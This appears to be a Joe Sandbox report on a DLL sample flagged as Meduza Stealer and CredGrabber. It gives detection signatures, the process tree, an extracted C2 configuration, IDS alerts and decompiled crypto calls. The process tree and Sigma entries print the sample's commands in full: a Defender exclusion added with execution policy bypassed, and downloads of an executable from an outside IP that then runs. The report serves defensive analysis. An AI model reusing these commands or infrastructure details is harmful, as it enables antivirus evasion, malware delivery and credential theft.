Edit tour

Windows Analysis Report
iviewers.dll

Overview

General Information

Sample name:	iviewers.dll
Analysis ID:	1578089
MD5:	e017be56699801dc89a8d6d1724eb633
SHA1:	a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256:	aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
Tags:	dlluser-NDA0E
Infos:

Detection

CredGrabber, Meduza Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CredGrabber

Yara detected Meduza Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Terminates after testing mutex exists (may check infected machine status)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4208 cmdline: loaddll32.exe "C:\Users\user\Desktop\iviewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6644 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 6036 cmdline: rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\5mg21dmq.1jt.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

5mg21dmq.1jt.exe (PID: 7640 cmdline: "C:\Windows\Temp\5mg21dmq.1jt.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)

regsvr32.exe (PID: 6988 cmdline: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

powershell.exe (PID: 6584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ochicikt.z2z.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ochicikt.z2z.exe (PID: 7480 cmdline: "C:\Windows\Temp\ochicikt.z2z.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)

rundll32.exe (PID: 1740 cmdline: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)

powershell.exe (PID: 5052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

inyligbs.qlq.exe (PID: 7608 cmdline: "C:\Windows\Temp\inyligbs.qlq.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)

powershell.exe (PID: 7536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 8136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\t0ppkxxj.rwu.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

t0ppkxxj.rwu.exe (PID: 6796 cmdline: "C:\Windows\Temp\t0ppkxxj.rwu.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)

cleanup

Malware Configuration

Threatname: Meduza Stealer

{"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Temp\5mg21dmq.1jt.exe	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
C:\Windows\Temp\inyligbs.qlq.exe	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
C:\Windows\Temp\ochicikt.z2z.exe	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
C:\Windows\Temp\t0ppkxxj.rwu.exe	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000001C.00000002.1958069772.000001C3CD9C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
0000001B.00000002.1919727858.0000023773BFC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
0000001D.00000002.1965863333.000002BDB06EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: t0ppkxxj.rwu.exe PID: 6796	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: t0ppkxxj.rwu.exe PID: 6796	JoeSecurity_CredGrabber	Yara detected CredGrabber	Joe Security
Process Memory Space: ochicikt.z2z.exe PID: 7480	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: inyligbs.qlq.exe PID: 7608	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: 5mg21dmq.1jt.exe PID: 7640	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
26.0.t0ppkxxj.rwu.exe.7ff621810000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
29.0.5mg21dmq.1jt.exe.7ff786a20000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
27.0.ochicikt.z2z.exe.7ff741a40000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
28.0.inyligbs.qlq.exe.7ff7cee60000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
27.2.ochicikt.z2z.exe.7ff741a40000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
28.2.inyligbs.qlq.exe.7ff7cee60000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
26.2.t0ppkxxj.rwu.exe.7ff621810000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
29.2.5mg21dmq.1jt.exe.7ff786a20000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 6988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 6584, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", ProcessId: 7844, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", ProcessId: 7844, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'", ProcessId: 7844, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1740, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5052, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:52:46.281767+0100	2049441	1	A Network Trojan was detected	192.168.2.4	49737	193.3.19.151	15666	TCP

ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:52:46.281767+0100	2050806	1	A Network Trojan was detected	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.401700+0100	2050806	1	A Network Trojan was detected	192.168.2.4	49737	193.3.19.151	15666	TCP

ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:52:46.281767+0100	2050807	1	A Network Trojan was detected	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.401700+0100	2050807	1	A Network Trojan was detected	192.168.2.4	49737	193.3.19.151	15666	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://147.45.47.15/duschno.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 29.0.5mg21dmq.1jt.exe.7ff786a20000.0.unpack

Malware Configuration Extractor: Meduza Stealer {"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\5mg21dmq.1jt.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Temp\inyligbs.qlq.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Temp\ochicikt.z2z.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: iviewers.dll	Virustotal: Detection: 34%			Perma Link
Source: iviewers.dll	ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\Temp\ochicikt.z2z.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\inyligbs.qlq.exe	Joe Sandbox ML: detected

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621887BA0 CryptUnprotectData,LocalFree,	26_2_00007FF621887BA0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621888440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,	26_2_00007FF621888440
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218883C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,	26_2_00007FF6218883C0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621843A30 BCryptDestroyKey,	26_2_00007FF621843A30
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621847C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,	26_2_00007FF621847C20
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621887EC0 CryptProtectData,LocalFree,	26_2_00007FF621887EC0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621888020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,	26_2_00007FF621888020
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A73A30 BCryptDestroyKey,	27_2_00007FF741A73A30
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB8440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,	27_2_00007FF741AB8440
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A77C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741A77C20
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB83C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741AB83C0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB7BA0 CryptUnprotectData,LocalFree,	27_2_00007FF741AB7BA0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB7EC0 CryptProtectData,LocalFree,	27_2_00007FF741AB7EC0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AB8020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741AB8020
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED8020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEED8020
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED7EC0 CryptProtectData,LocalFree,	28_2_00007FF7CEED7EC0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED83C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEED83C0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED7BA0 CryptUnprotectData,LocalFree,	28_2_00007FF7CEED7BA0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEED8440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,	28_2_00007FF7CEED8440
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE97C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEE97C20
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEE93A30 BCryptDestroyKey,	28_2_00007FF7CEE93A30
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A98020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786A98020
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A97EC0 CryptProtectData,LocalFree,	29_2_00007FF786A97EC0
